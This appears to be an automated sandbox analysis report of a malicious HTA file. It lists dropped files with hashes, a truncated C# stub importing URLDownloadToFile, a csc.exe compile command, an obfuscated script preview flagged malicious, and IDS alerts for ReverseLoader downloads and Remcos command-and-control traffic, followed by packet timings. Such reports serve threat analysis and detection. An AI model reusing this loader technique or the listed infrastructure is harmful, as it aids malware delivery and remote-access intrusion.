                                                                                                        File Type:MSVC .res
                                                                                                        Category:dropped
                                                                                                        Size (bytes):652
                                                                                                        Entropy (8bit):3.0968018120019516
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygJak7YnqqT+PN5Dlq5J:+RI+ycuZhNCakSKPNnqX
                                                                                                        MD5:B24BC111C83A2FEB04DEA135993E6137
                                                                                                        SHA1:393B84877FAD578D7BC119009F4041E40335D511
                                                                                                        SHA-256:7EA41F0780A8AB91EB455B283A54F624020BBC6226A3B8F3AEC56FC2AE133956
                                                                                                        SHA-512:7D8EEC39B6D14943B10C4117EF05EADD04B3F717A73D12F2CD4565D8D2BC37734B69BE64BDC32FDAD6FBE5BE49BA0AC8377900F379FFBB8A9AB1530F7A4E6DCB
                                                                                                        Malicious:false
                                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.x.b.5.o.0.m.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.x.b.5.o.0.m.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (371)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):485
                                                                                                        Entropy (8bit):3.8046840691915524
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:V/DsYLDS81zufU+PM6JQXReKJ8SRHy4HBa741R6mJM37ziM4vwy:V/DTLDfumXfHsuzMr2Pvwy
                                                                                                        MD5:C0AB7D9C1B9063DC8A229D9074412EC6
                                                                                                        SHA1:4822B8B99901C563E7B2EB0399AAB1ADA29809D1
                                                                                                        SHA-256:05DA06F5D5AFBB950C215D14A1AE166C256466F43298BF300DDFFE6CF87D6EF6
                                                                                                        SHA-512:3D09208B03CBBCA2F036D4C7CAF06990AF60C40FD3727F59489C454E7D8D02A6F0ED1448040F224A093695DD143836044D5AFDD8543C921A2F543246DA57B4BF
                                                                                                        Malicious:false
                                                                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace lxyDl.{. public class zMBim. {. [DllImport("uRlmoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr DqtOAvHz,string wYFEVuZIp,string G,uint HgyMZmZV,IntPtr hqfJoYdlGn);.. }..}.
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):375
                                                                                                        Entropy (8bit):5.218203078705514
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fdKzxs7+AEszIN723fd9x:p37Lvkmb6K2acWZETa5
                                                                                                        MD5:30DD8F209D973E05752D4739B6981950
                                                                                                        SHA1:8F888768668E7E7E89FF0127EAABC57EAD2946E9
                                                                                                        SHA-256:DDBD991095BEC1FE84024ED5D243DD0A7D5A5ADF1548D531739EFB38AD240636
                                                                                                        SHA-512:38C67ACFD43CFDC53C7030CCAAA1879C8A93121E205AC8F29882593D5A5B0BEF4BCF41FC0DCB42CE0E5BD02B2F3C0823B2793079043B97BDC7185F35BB577475
                                                                                                        Malicious:true
                                                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.0.cs"
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3072
                                                                                                        Entropy (8bit):2.8357371096945596
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:etGSFPBe5ekrl8OUplkkyG2/etkZfwvVCbCZ0WI+ycuZhNCakSKPNnq:6+skr+OUoG2/RJwvwbCZX1ulCa3mq
                                                                                                        MD5:027A9954CB2A7A916D82FBBFCAADBD68
                                                                                                        SHA1:7466DAD77D543AFF995FE9F133BE504BCAFB2DAB
                                                                                                        SHA-256:202919D9D61276DC0860693AB32E11623CB6398C402A4624AA7F31BCB1762757
                                                                                                        SHA-512:14DCE4C03F0F01B7A9C4AF592F62B33F180D514D34D352E7DAAF5687A101B23196D67AB7EDA10B937A24EF420B4D16C8AD24342712D517F57C8A81E9EE6753D4
                                                                                                        Malicious:false
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X'ag...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................3.,.....{.....{.......................................... :.....P ......L.........R.....[.....e.....g.....p...L.....L...!.L.....L.......!.....*.......:.......................................#..........<Module>.bx
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
                                                                                                        Category:modified
                                                                                                        Size (bytes):876
                                                                                                        Entropy (8bit):5.305452149758617
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:KOuqd3ka6K2aNETa8Kax5DqBVKVrdFAMBJTH:yika6CNE+8K2DcVKdBJj
                                                                                                        MD5:9D73980D7891CB843FB8DFFF11F8FECA
                                                                                                        SHA1:BE1B6C1942D2EF34F661B9356FED9BD9E9CBB15E
                                                                                                        SHA-256:480CDBA1D202D7249AF067A9683540807ACB472E7309A06548CA29C1F291C595
                                                                                                        SHA-512:14C4CF4708BED61D38330C162D37207E9060FD752D871C3D90C7235277489C1D84F3253A7AE53BACA4F6326A70610F90DEEAF94C4ED4539A519229025393CA61
                                                                                                        Malicious:false
                                                                                                        Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (3281), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):154104
                                                                                                        Entropy (8bit):3.8082312070089706
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:qPN5KVAyQa3DsbfgpYcPN5KVAyQa3DsbfgpYNPN5KVAyQa3DsbfgpYf:25YYgpj5YYgpY5YYgpm
                                                                                                        MD5:80C468CCCBC1D6AA31D066F64CE06B42
                                                                                                        SHA1:6276DA318E9EC1756DDA7D7C9E9B2C5F00D3FDA4
                                                                                                        SHA-256:79A186BD409CAF82E85361C6885FD71EE00BEA6968D85CB8C9B71535909FE411
                                                                                                        SHA-512:37FD56E6121926E15433636AFE449F7002DE7A5BE35C18F8855D2E24C3542EABD7533B2DDB363E49972DDCA03F3EDB5868BB944AC799FF2FCF245D6271BF6662
                                                                                                        Malicious:true
                                                                                                        Preview:...... . . . .....Z.L.G.N.h.N.l.g.K.p.i.h.R.b.o. .=. .".c.A.m.c.G.f.q.k.h.U.J.J.u.d.t.".....L.K.G.L.h.k.K.L.G.h.L.f.i.i.j. .=. .".i.L.C.m.p.Z.Z.m.p.Q.u.K.g.P.e.".....c.I.L.B.K.c.m.J.K.e.d.Z.k.d.U. .=. .".K.N.W.G.f.W.c.m.t.Z.k.n.f.i.L.".........G.i.l.P.Z.c.e.b.b.z.l.P.K.h.f. .=. .".R.z.h.K.O.h.P.j.S.G.W.i.c.c.W.".....c.N.m.d.x.l.e.W.f.p.L.h.G.O.p. .=. .".s.A.W.G.L.m.z.A.L.m.z.W.m.A.p.".....o.K.N.n.l.G.H.d.B.x.n.q.A.l.C. .=. .".x.j.A.z.K.j.i.G.Z.K.b.p.j.q.c.".....A.t.N.R.c.h.m.c.n.J.H.G.z.i.c. .=. .".L.h.c.Z.p.J.K.x.B.W.c.A.c.B.r.".....c.k.L.m.K.a.p.t.A.c.Z.h.p.G.W. .=. .".e.b.k.K.W.m.A.G.t.W.O.A.P.L.L.".....i.C.L.A.W.W.W.P.R.G.T.G.c.U.i. .=. .".i.W.m.W.d.a.U.P.f.K.K.x.a.c.N.".....L.o.I.p.p.q.k.h.L.J.f.h.C.i.L. .=. .".U.N.L.d.W.J.N.r.s.L.k.A.R.m.g.".....h.G.N.a.W.C.m.U.L.i.L.W.N.L.Q. .=. .".k.e.e.e.L.m.L.W.L.z.o.b.G.A.U.".....U.z.i.h.c.z.Z.W.e.I.N.i.W.l.P. .=. .".C.U.d.i.p.W.L.k.v.c.R.W.a.k.g.".....K.P.L.b.P.o.O.N.T.o.C.K.p.K.W. .=. .".s.f.n.k.H.b.G.R.m.k.K.O.f.G.H.".....L.l.g.W.P.B.k.L.
                                                                                                        File type:HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
                                                                                                        Entropy (8bit):2.6474747251710156
                                                                                                        TrID:
                                                                                                          File name:seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta
                                                                                                          File size:147'715 bytes
                                                                                                          MD5:80636733be5c6936770df78c2298d639
                                                                                                          SHA1:0e9cd08975bff8b04e8e7671f13c2585c25796a5
                                                                                                          SHA256:9c4e6335372584e7b1e145fe9ac1eeb43c148ac9b98337a4629b817badc83eec
                                                                                                          SHA512:6518d2d47c9f724e9beeae9440ac82d379d51e8bd81970fe37b933f07e2ebe7e280c91c30202cf4c57776551ff2524d78bceb486a74a100472838d96500fa1a7
                                                                                                          SSDEEP:768:t1EuT0um2oum2uD5KUJDVUKhCTGVf/ACBzg2lw1/lEwUUKBqe/zg7szgmUM/ONvT:tF
                                                                                                          TLSH:46E35327C59B9838F5BBAEFFE33C9B2A51826E01F4CE854F055C09D42DE2547712CA68
                                                                                                          File Content Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-17T07:22:04.164352+0100 | 2858795 | ETPRO MALWARE ReverseLoader Payload Request (GET) M2 | 1 | 192.168.2.6 | 49707 | 74.208.80.248 | 80 | TCP
2024-12-17T07:22:15.219733+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 151.101.1.137 | 443 | 192.168.2.6 | 49715 | TCP
2024-12-17T07:22:34.406542+0100 | 2841075 | ETPRO MALWARE Terse Request to paste .ee - Possible Download | 1 | 192.168.2.6 | 49770 | 104.21.84.67 | 443 | TCP
2024-12-17T07:22:34.828568+0100 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 104.21.84.67 | 443 | 192.168.2.6 | 49770 | TCP
2024-12-17T07:22:34.828568+0100 | 2020425 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 | 1 | 104.21.84.67 | 443 | 192.168.2.6 | 49770 | TCP
2024-12-17T07:22:35.787359+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 104.21.84.67 | 443 | 192.168.2.6 | 49770 | TCP
2024-12-17T07:22:46.846421+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49781 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:22:58.336073+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49808 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:23:09.838732+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49837 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:23:21.438169+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49864 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:23:33.104616+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49893 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:23:44.734225+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49920 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:23:56.594727+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49948 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:24:08.295942+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49977 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:24:19.710724+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49995 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:24:31.236430+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49996 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:24:42.850727+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49997 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:24:54.404510+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49998 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:25:06.336610+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49999 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:25:17.732093+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50000 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:25:29.400873+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50001 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:25:40.898648+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50003 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:25:52.532172+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50004 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:26:04.034079+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50005 | 192.169.69.26 | 2430 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 07:22:02.888204098 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:03.008344889 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:03.010004997 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:03.015948057 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:03.135999918 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.164150000 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.164254904 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.164268970 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.164294004 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.164309978 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.164351940 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.164391041 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.164416075 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.164439917 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.164455891 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.164458036 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.164469957 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.164485931 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.164530993 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.164530993 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.164530993 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.284645081 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.284698009 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.284710884 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.284775019 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.288765907 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.288909912 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.356700897 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.356781960 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.356813908 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.356858015 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.360785961 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.360986948 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.361035109 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.361248016 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.369265079 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.369353056 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.369370937 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.369554043 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.377655983 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.377791882 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.377815962 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.377887011 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.386046886 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.386121035 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.386179924 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.386487007 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.394488096 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.394619942 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.394689083 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.394689083 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.402951956 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.403027058 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.403095007 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.403137922 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.411387920 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.411484957 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.411549091 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.419783115 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.419887066 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.420001984 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.420001984 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.428405046 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.428467989 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.428570986 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.428704023 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.436131001 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.436201096 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.436266899 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.436266899 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.548840046 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.548861027 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.548921108 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.551067114 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.551146030 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.551203012 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.551333904 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.555888891 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.555905104 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.555974960 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.560589075 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.560702085 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.560758114 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.560758114 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.565363884 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.565473080 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.565484047 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.565551996 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.570089102 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.570169926 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.570307970 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.570307970 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.574758053 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.574829102 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.574922085 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.574982882 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.579485893 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.579540968 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.579647064 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.579715967 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.584280968 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.584340096 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.584388971 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.584460974 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.588855028 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.588918924 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.589026928 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.593513966 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.593676090 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.593755007 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.593755007 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.598304033 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.598372936 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.598412037 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.598515987 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.602957010 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.603038073 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.603184938 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.607642889 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.607729912 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.607803106 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.607861042 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.612278938 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.612334967 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.612385035 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.612517118 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.616995096 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.617136955 CET | 49707 | 80 | 192.168.2.6 | 74.208.80.248
Dec 17, 2024 07:22:04.740822077 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
Dec 17, 2024 07:22:04.741048098 CET | 80 | 49707 | 74.208.80.248 | 192.168.2.6
